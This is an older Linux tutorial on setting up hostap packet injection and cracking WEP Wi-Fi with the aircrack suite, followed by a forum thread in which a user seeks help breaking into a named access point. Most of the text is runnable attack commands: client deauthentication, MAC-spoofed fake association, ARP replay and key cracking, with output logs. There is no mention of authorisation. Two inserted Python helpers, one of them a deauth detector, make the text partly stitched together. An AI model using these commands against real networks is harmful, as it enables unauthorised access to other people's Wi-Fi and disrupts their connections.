Operating system: Ubuntu 6.06 LTS Dapper Drake (works with Ubuntu 6.10, 7.04 and 7.10 too; see the link for patching hostap on newer Ubuntu releases). Hardware: WiFi adapters Z-Com XI-626 (Prism 2.5) and CM9 (Atheros). Applications: Aircrack pack, Kismet, tcpdump. Driver: HostAP + packet injection patch tutorial. Questions and other things in the Forum.
Lead-up
The Ubuntu repositories contain everything needed, including the hostap source, but we use the latest hostap release, 0.4.9, together with the 0.4.7 packet injection patch.
Ubuntu installed from DVD uses a kernel chosen by processor type (on AMD it uses the k7 kernel, on Intel the i386 kernel). The packet injection patch does not work correctly, or at all, under the k7 kernel, so we need to install the kernel headers and the i386 kernel image and boot into it.
The Z-Com XI-626 adapter (generally, in Linux) is claimed by the orinoco module. Unload that module and load hostap instead; as root:
modprobe -r orinoco_pci
modprobe hostap_pci
Add line
blacklist orinoco_pci
into
/etc/modprobe.d/blacklist
Driver
After rebooting, download the driver and apply the patch.
wget http://hostap.epitest.fi/releases/hostap-driver-0.4.9.tar.gz
tar -xvzf hostap-driver-0.4.9.tar.gz
cd hostap-driver-0.4.9
wget http://patches.aircrack-ng.org/hostap-driver-0.4.7.patch
patch -Np1 -i hostap-driver-0.4.7.patch
In the directory
/home/user/hostap-driver-0.4.9/driver/modules/
find the files:
hostap.c
hostap_cs.c
hostap_plx.c
hostap_pci.c
In each of these files find the following five lines and remove them.
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,14))
#error Host AP driver was added into Linux 2.6.14.
#error The version used in the kernel tree should be used instead of this
#error external release which is only maintained for old kernel versions.
#endif
Now compile. Run:
make
After that, don't use "make install". First back up the original contents, then clean out the
/hostap folder and copy all *.ko files from
/hostap-driver-0.4.9/driver/modules/
into
/lib/modules/2.6.....-386/kernel/drivers/net/wireless/hostap/
Find and copy hostap_en.conf from
/hostap-driver-0.4.9/driver/etc/
into
/etc/pcmcia/
Reboot. After rebooting, run these commands:
depmod -a
ifconfig wlan0 down
ifconfig wlan0 up
Check that the driver loaded:
dmesg | grep hostap
Firmware
A Z-Com with firmware newer than 1.7.4 is registered in the system as ethX. Firmware 1.7.4 is the recommended version; otherwise try to flash your adapter. Check your firmware version with
hostap_diag -p wlan0
You will see something like this:
Host AP driver diagnostics information for 'wlan0'
NICID:
id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)
PRIID:
id=0x0015 v1.1.1
STAID:
id=0x001f v1.7.4 (station firmware)
Channel no. 14
To enable channel 14 on the Z-Com adapter we need to edit the PDA (Production Data Area). Don't change the localization; just change
1fff to 3fff
on line 0x0104.
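Added example, not from the original tutorial: a small Python helper that parses the hostap_diag output shown above into records, checks the station firmware against the 1.7.4 the text recommends, and decodes the PDA channel mask that the 1fff to 3fff edit changes (bit n set means channel n+1 is allowed, which is what that edit implies). The sample diagnostics text is the page's example re-typed inline; the PDA helper works on the mask value, not on the PDA file format.

```python
import re

# Constructed sample of `hostap_diag -p wlan0` output, in the shape the page
# shows (the values are the page's example, not read from a real adapter).
SAMPLE_DIAG = """Host AP driver diagnostics information for 'wlan0'
NICID:
id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash))
PRIID:
id=0x0015 v1.1.1
STAID:
id=0x001f v1.7.4 (station firmware)
"""

# "<NAME>ID:" on one line, "id=0x<hex> v<major>.<minor>.<patch> ..." on the next
RECORD = re.compile(r"^(\w+ID):\n^id=0x([0-9a-fA-F]+) v(\d+)\.(\d+)\.(\d+)", re.M)


def parse_hostap_diag(text):
    """Return {'NICID': {'id': int, 'version': (major, minor, patch)}, ...}."""
    out = {}
    for m in RECORD.finditer(text):
        out[m.group(1)] = {"id": int(m.group(2), 16),
                           "version": tuple(int(x) for x in m.group(3, 4, 5))}
    return out


def station_firmware_ok(text, minimum=(1, 7, 4)):
    """True when the STAID (station firmware) version is at least `minimum`,
    the version the text recommends before considering a reflash."""
    sta = parse_hostap_diag(text).get("STAID")
    return sta is not None and sta["version"] >= minimum


def allowed_channels(mask):
    """Decode the allowed-channel bitmask: bit n set -> channel n+1 usable.
    0x1fff gives channels 1..13, 0x3fff gives channels 1..14."""
    return [ch for ch in range(1, 17) if mask & (1 << (ch - 1))]


def pda_channel14_patch(mask):
    """The page's edit expressed on the mask value: set bit 13 (channel 14)
    and leave every other bit of the mask untouched."""
    return mask | (1 << 13)
```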
Testing functionality
Packet injection is nothing more than a time saver: cracking WEP is possible without it, but it can take tens of hours or a few days.
Aircrack pack contains these parts:
aircrack, airodump, airmon, aireplay, airdecap
Aircrack-ng pack contains these parts:
aircrack-ng, airodump-ng, airmon-ng, aireplay-ng, packetforge-ng, airtun-ng, airserv-ng
We use packet injection in Aireplay. Before we start working we should check that packet injection works.
Option 1: switch the adapter to monitor mode. iwconfig is part of wireless-tools, airmon is part of the Aircrack pack.
iwconfig wlan0 mode monitor
or
airmon start wlan0
for Aircrack-ng
airmon-ng start wlan0
Now run Ethereal or Wireshark showing live traffic on the wlan0 adapter.
To show only deauth packets use the display filter
wlan.fc.type_subtype == 12
Run in shell
aireplay -0 5 -a 01:02:03:04:05:06 wlan0
for Aircrack-ng:
aireplay-ng -0 5 -a 01:02:03:04:05:06 wlan0
In the Ethereal window you should see five deauth packets with the MAC address 01:02:03:04:05:06.
Option II: test against an AP with a hidden ESSID. If the client deauth does not work on an encrypted network even though you know its MAC, you are out of luck.
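Added example, not part of the original tutorial: the receiving side of the injection test above, a Python parser that picks deauthentication and disassociation frames out of raw 802.11 frames and flags any transmitter that sends a burst of them, which is what the five-packet test, or a real deauth flood, looks like to a monitoring station. The frames are constructed inline (no radiotap header); the MAC addresses and reason codes are sample values.

```python
import struct
from collections import Counter

# 802.11 management subtypes that carry a 2-byte reason code body
DEAUTH, DISASSOC = 12, 10
# A few IEEE 802.11 reason codes; 6 is the "Class 2 frame received from
# nonauthenticated station" that the tcpdump output later on this page shows
REASONS = {1: "unspecified", 3: "STA is leaving",
           6: "class 2 frame from nonauthenticated STA",
           7: "class 3 frame from nonassociated STA"}


def mac(raw):
    return ":".join("%02x" % b for b in raw)


def parse_mgmt(frame):
    """Parse a raw 802.11 frame (no radiotap/prism header). Returns a dict for
    deauthentication/disassociation frames and None for anything else."""
    if len(frame) < 26:
        return None
    fc = frame[0]                              # frame control, low byte
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    da, sa, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack_from("<H", frame, 24)[0]
    return {"kind": "deauth" if subtype == DEAUTH else "disassoc",
            "da": mac(da), "sa": mac(sa), "bssid": mac(bssid),
            "reason": reason, "reason_text": REASONS.get(reason, "other")}


def build_deauth(da, sa, bssid, reason, seq):
    """Constructed frame for the sample below (test data, not a capture)."""
    hdr = struct.pack("<BBH6s6s6sH", 0xC0, 0x00, 0, da, sa, bssid, seq << 4)
    return hdr + struct.pack("<H", reason)


def find_deauth_bursts(frames, threshold=5):
    """Count deauth/disassoc frames per (transmitter, BSSID) and return the
    pairs at or above `threshold`, the signature of the injection test the
    text describes (five deauths from one MAC) or of a deauth flood."""
    counts = Counter()
    for f in frames:
        p = parse_mgmt(f)
        if p:
            counts[(p["sa"], p["bssid"])] += 1
    return {k: n for k, n in counts.items() if n >= threshold}


# Constructed sample: five broadcast deauths "from" 01:02:03:04:05:06 (the MAC
# in the aireplay test above), one ordinary deauth from a client that is
# leaving, and one data frame that the parser must ignore.
AP = bytes.fromhex("010203040506")
CLIENT = bytes.fromhex("0060b9aabbcc")
BCAST = b"\xff" * 6
SAMPLE_FRAMES = [build_deauth(BCAST, AP, AP, 7, i) for i in range(5)]
SAMPLE_FRAMES.append(build_deauth(AP, CLIENT, AP, 3, 9))
SAMPLE_FRAMES.append(struct.pack("<BBH6s6s6sH", 0x08, 0, 0, AP, CLIENT, AP, 0) + b"\x00" * 8)
```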
Monitor mode, detection
Hundreds of pages have been written about the weaknesses of WEP (Wired Equivalent Privacy), and new attacks like Chopchop keep coming out, so if you want to know more, go and search.
Switch adapter to monitor mode
airmon start wlan0
cmd for Aircrack-ng:
airmon-ng start wlan0

Run Airodump, which scans the available networks until stopped (Ctrl+C). "3"
is the channel number and "out" is the log file. The "1" after the channel number means that only WEP packets will be logged. (The log file name and channel number are optional.)
airodump wlan0 out 3 1
cmd for Aircrack-ng:
airodump-ng --ivs -w out --ch 3 wlan0
for Aircrack-ng, filtering on a particular MAC in case plenty of APs are around:
airodump-ng --bssid 00:60:Bx:xx:xx:xx --ivs -w out --ch 3 wlan0

Aircrack comment: without specifying the file format "1" (meaning "ivs") it is possible to store into pcap. The first thing we notice is the signal strength. Too large or too small a distance is a problem; when too close (saturation) there may be no usable signal even with the AP right next to you on the desk.
The displayed PWR values are genuine. A value lower than 163 means no hope; the optimal
PWR value is between 167 and 195. Finding the best direction by moving the
antenna and watching PWR costs a minimum of time, and finding the polarization is a matter of rotating the antenna 90°. To improve throughput use power regulation (the default on Z-Com is 198):
iwpriv wlan0 writemif 62 130
This leads to less packet loss:
iwconfig wlan0 rate 1M
Sensitivity control:
iwconfig wlan0 sens 3 [1, 2, 3]
Deauth, Packet injection, Hidden essid
The detected AP has a good signal and connected clients but does not broadcast its ESSID.

Use Aireplay -0. The number 5 is the count of deauth packets we send.
"-0" is the first of the five modes in Aireplay.
Deauth to broadcast
aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0
Deauth client with MAC.
aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
Deauth to broadcast with MAC of source
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx wlan0
Deauth to client with MAC of source
aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0
cmd for Aireplay-ng:
aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

The deauth "disconnects" the client from the AP, and Airodump in the first shell records the client's reconnection, which contains the ESSID. Now we have the name of the AP.

PenTest: Association
To begin communicating with the AP it is first necessary to knock on the door :-) that is, to associate. If MAC restriction is set up on the AP it is necessary to know at least one valid MAC address; this is exactly what the listing of connected clients is for. When Airodump does not detect any clients it means: bad signal, bad timing :-), an ad-hoc network, or a data AP. Nobody usually connects to such a data AP; it serves only as a data line (used for example by UPC), repeater, [bridge]
aireplay -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0
Aireplay-ng cmd:
aireplay-ng -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx ath0

With a sufficient signal, knowledge of the ESSID [AP name] and an allowed MAC address (in the case of MAC restriction), the association works 99% of the time.
ARP, trafic generation
After the association, start packet injection with Aireplay -3 [ARP-request replay]. Replaying multiplies the traffic, the number of WEP packets and thus the number of initialization vectors :-)
aireplay -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0
Aireplay-ng:
aireplay-ng -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0

-x 600 is the number of packets per second. The number of ARP requests
-u stops at 1024.
Watch the progress in the first panel.

The time Airodump needs to gather enough packets [for a 64-bit key 80 to 300 000, for a 128-bit key 300 000 to 1 000 000 packets] depends on the speed of the link, that is, the quality of the signal as mentioned above. Gathering takes from 10 minutes to one hour [+, -]. Ideally you associate with the same MAC address as a client who is generating traffic himself [for example downloading on p2p]; in that case, after starting packet injection, 300 000 IVs arrive in a few minutes. Aireplay, as well as Airodump and Aircrack, can be stopped and restarted without affecting the result.
Continued in the text Korek, Kismet and Gateway.
Hack WEP Access Point with MAC filtering
Edit:
This is a discussion, NOT a HelpDesk. Do not ask for help here. For consulting come to the IRC channel or ask in the Forum topic. Thx.
re: Crack AP with MAC filtering
Hi. It works with attack aireplay-ng 4 or 5 (Korek's chopchop, fragmentation). Association needs only attacks 2 and 3. A hidden ESSID is possible to uncover with tools like MDK or SKA. I think USB devices are backwards compatible; USB 2 works with USB 1 with no problem.
How to configure USB 2.0 to USB 1.1 on BackTrack
Thanks for your answer arestes, but I can't try the aireplay-ng 4 or 5 attacks because my MB K7N2 Delta-L ILSR is damaged (it supports USB 1.1 if I change it in the BIOS setup), which made my rt73 work over my long USB cable (11 meters from my roof) with Backtrack. For example, the MB P4M800pro (in Windows) can be set to USB 1.1 if I disable the USB enhanced host controller, but I don't know how to configure USB 2.0 to USB 1.1 in Backtrack. Is there any solution so I can run airodump-ng + aireplay-ng + aircrack-ng with USB 1.1 on Backtrack?
re: serialmonkey and enhanced USB controller
It's recommended to turn off the enhanced USB controller for packet injection with some versions of the serialmonkey driver.
Tools to uncover + connect to a hidden ESSID in Windows XP
Oh yes arestes.. Do tools like MDK or SKA work on Windows XP too? Can you mention where I can download tools to uncover a hidden ESSID and connect to a hidden ESSID on Windows XP with a Ralink rt73.. Thanks for your help
re: hidden ESSID
Windows is operating system for painting pictures and playing games :)
WEP crack - Access Point no client, no MAC restriction
Thanks for the comments, but now I am desperate to try attack aireplay-ng 4 or 5 (Korek's chopchop, fragmentation) and attacks 2 and 3. There is no response and the Access Point rejects it. I think DARKIPUNK03 does not allow all client MACs to connect, but I'm not sure? Can you help and tell me any other commands, one by one, to crack this AP with no client allowed to connect? If I use Kismet to get information on the DARKIPUNK03 AP it is always constrained by a Suspicious client (probing networks but never participating). I use Backtrack 3 and I am not an expert. Thx for help. Screenshot
re: Darkipunk WEP crack
Hi Darkipunk. One more detail.. are you injecting with the right driver? After removing the USB wireless device
modprobe rt73
Plug the device in, activate the interface and start monitor mode
ifconfig rausb0 up
iwconfig rausb0 mode monitor or iwpriv rausb0 rfmontx 1
To detect and display signal strength (with the serialmonkey driver loaded)
iwpriv rausb0 forceprism 1
Do you..?
crack DarkIpunK03 AP
Yes n3tQ. I think I have activated monitor mode, so I can start airodump-ng and kismet.
ifconfig rausb0 up
airmon-ng start rausb0
=========================================
Before, the WEP key of DARKIPUNK03 could be found with a simple crack:
airodump-ng --channel 6 --write output --ivs rausb0
aireplay-ng --fakeauth 30 -e DARKIPUNK03 -a 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX rausb0
aireplay-ng --arpreplay -b 00:02:6F:XX:XX:XX -h 00:C0:A8:XX:XX:XX -x 512 rausb0
aircrack-ng -b 00:02:6F:XX:XX:XX output-01.ivs
screenshot
I think the WEP key could be found because I got the MAC of the station/client (00:C0:A8:XX:XX:XX). But now the WEP key of the DARKIPUNK03 AP has changed, it has a MAC filter and the MAC station/clients are hidden, but the BSSID is still probing. I am still confused about how to crack the DARKIPUNK03 AP???
=======================================
I have tried to fake all the MACs in the air near the AP; it always gets rejected, error:
03:43:45 Sending Authentication Request (Open System)
03:43:45 AP rejects the source MAC address (XX:XX:XX:XX:XX:XX) ?
Authentication failed (code 1)
03:54:17 Sending Authentication Request (Open System)
03:54:17 Authentication failed (code 14)
Saving chosen packet in replay_src-0402-044330.cap
04:49:44 Data packet found!
04:49:44 Sending fragmented packet
04:49:46 No answer, repeating...
04:49:46 Trying a LLC NULL packet
04:49:46 Sending fragmented packet
04:49:59 No answer, repeating...
04:50:01 Sending fragmented packet
04:50:01 Got a deauthentication packet!
04:50:06 No answer, repeating...
04:50:06 Still nothing, trying another packet...
========================================
What is forceprism 1 used for? Is my forceprism activated? How do I activate forceprism?
========================================
I loaded the default driver from the Backtrack 3 LiveCD; the rt73 is from serialmonkey too. I don't know how to install from http://rt2x00.serialmonkey.com/rt73-cvs-daily.tar.gz. I have extracted it to /root and tried
$ cd ./rt73-cvs-YYYYMMDDHH/Module
$ make
and it always fails with an error. How do I install the rt73-cvs-daily driver?
modprobe rt73
Where is the answer to my question.. did you modprobe rt73 ???
How to load module for Linksys USB WiFi
I don't know how to tell whether the response to modprobe rt73 is OK, can you tell me? I have tried: (sorry for the text because I don't know how to order it)
bt ~ # lsusb
Bus 4 Device 2: ID 13b1:0020 Linksys WUSB54GC 802.11g Adapter [ralink rt73]
Bus 4 Device 1: ID 0000:0000
Bus 2 Device 1: ID 0000:0000
Bus 1 Device 2: ID 062a:0000 Creative Labs
Bus 1 Device 1: ID 0000:0000
Bus 3 Device 1: ID 0000:0000
bt ~ # modprobe rt73
bt ~ # ifconfig rausb0 up
bt ~ # iwconfig rausb0 mode monitor
bt ~ # iwpriv rausb0 rfmontx 1
bt ~ # iwpriv rausb0 forceprism 1
bt ~ # iwpriv rausb0
rausb0 Available private ioctls :
set (8BE2) : set 1024 char & get 0
bbp (8BE3) : set 1024 char & get 1024 char
mac (8BE5) : set 1024 char & get 1024 char
adhocOfdm (8BE6) : set 1 int & get 0
stat (8BE9) : set 1024 char & get 1024 char
get_site_survey (8BED) : set 1024 char & get 1024 char
get_RaAP_Cfg (8BEF) : set 1024 char & get 0
forceprism (8BF0) : set 1024 char & get 0
rfmontx (8BEC) : set 1024 char & get 1 char
auth (8BE7) : set 1 int & get 0
enc (8BE8) : set 1 int & get 0
wpapsk (8BEA) : set 64 char & get 0
psm (8BEB) : set 1 int & get 0
bt ~ # modinfo rt73
filename: /lib/modules/2.6.21.5/extra/rt73.ko
license: GPL
description: Ralink RT73 802.11abg WLAN Driver k2wrlz modifications 2.0.0
author: http://rt2x00.serialmonkey.com
alias: usb:v13B1p0023d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p90ACd*dc*dsc*dp*ic*isc*ip*
alias: usb:v1690p0722d*dc*dsc*dp*ic*isc*ip*
alias: usb:v06F8pE010d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DF6p9712d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v13B1p0020d*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp705Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v050Dp7050d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C04d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07D1p3C03d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p800Ad*dc*dsc*dp*ic*isc*ip*
alias: usb:v1631pC019d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9032d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1371p9022d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1472p0009d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0769p31F3d*dc*dsc*dp*ic*isc*ip*
alias: usb:v07B8pB21Dd*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA861d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0pA874d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0DB0p6877d*dc*dsc*dp*ic*isc*ip*
alias: usb:v14B2p3C22d*dc*dsc*dp*ic*isc*ip*
alias: usb:v1044p8008d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6229d*dc*dsc*dp*ic*isc*ip*
alias: usb:v18E8p6196d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2671d*dc*dsc*dp*ic*isc*ip*
alias: usb:v148Fp2573d*dc*dsc*dp*ic*isc*ip*
alias: usb:v0B05p1723d*dc*dsc*dp*ic*isc*ip*
depends:
vermagic: 2.6.21.5 SMP mod_unload 486
parm: debug:Enable debug, accepted values: 0 (no debug, default), 1 (Trace), 2 (Info). (int)
I get a problem when I want to install the rt73 driver from serialmonkey; I tried like this:
bt ~ # cd rt73-cvs-2008040114
bt rt73-cvs-2008040114 # cd Module/
bt Module # make
make: *** /lib/modules/2.6.21.5/build: No such file or directory. Stop.
rt73.ko failed to build!
make: *** [module] Error 1
bt Module # makefile
-bash: makefile: command not found
bt Module # dir
CVS/ connect.c oid.h rtmp.h rtmp_type.h sync.c
Makefile iwpriv_usage.txt rt2x00debug.c rtmp_def.h rtmp_wep.c wpa.c
TESTING md5.c rt2x00debug.h rtmp_info.c rtusb_bulk.c wpa.h
assoc.c md5.h rt73.bin rtmp_init.c rtusb_data.c
auth.c mlme.c rt73.h rtmp_main.c rtusb_io.c
auth_rsp.c mlme.h rt_config.h rtmp_tkip.c sanity.c
please help me n3tQ..
re: modprobe rt73 to darkipunk
Hi man, this is a never ending story.. I think it'll be better (and quicker) if you come into our IRC channel to pow wow about modprobe rt73.
dictionary phrase
But does this require that the passphrase be a dictionary phrase, or a combo of words found in the dictionary?
Deauth/disassoc packet
Thanks for helping me in the IRC channel, but now I can't find the airdump.net channel. I "got a deauth/disassoc packet. Is the source MAC associated?". Can I resolve this distraction? Is it the deauth from the Suspicious client?
re: Deauth
I think I can't understand your question.
sorry with my english n3tQ
Sorry for my English n3tQ :) Is there any app to find valid authenticated clients on the AP? Because I always get a deauth/disassoc packet when I run all the attack modes with the fake client MACs shown in Kismet (because I can't see the clients of the AP in airodump-ng). If I have caught 1 ARP I always get a deauth/disassoc; can I resolve it?
Some of the attacks say:
Saving chosen packet in replay_src-0418-113957.cap
11:40:02 Data packet found!
11:40:02 Sending fragmented packet
11:40:02 Got a deauthentication packet!
---
07:19:34 AP rejects the source MAC address (00:02:6F:XX:XX:XX) ?
Authentication failed (code 1)
---
11:33:31.416337 Retry 213us BSSID:00:02:6f:XX:XX:XX DA:00:02:6f:XX:XX:XX SA:00:02:6f:XX:XX:XX DeAuthentication: Class 2 frame received from nonauthenticated station
n3tQ, why does it always fail when I run airoscript 6, 7, 8, 9 or 10, and not show a response from aireplay-ng?
6) Chopchop attack
7) Chopchop attack using a client
8) Solo interactive attack (attempt to jump start stalled injections)
9) Chopchop attack injection part of the attack
10) Chopchop attack using a client injection part of the attack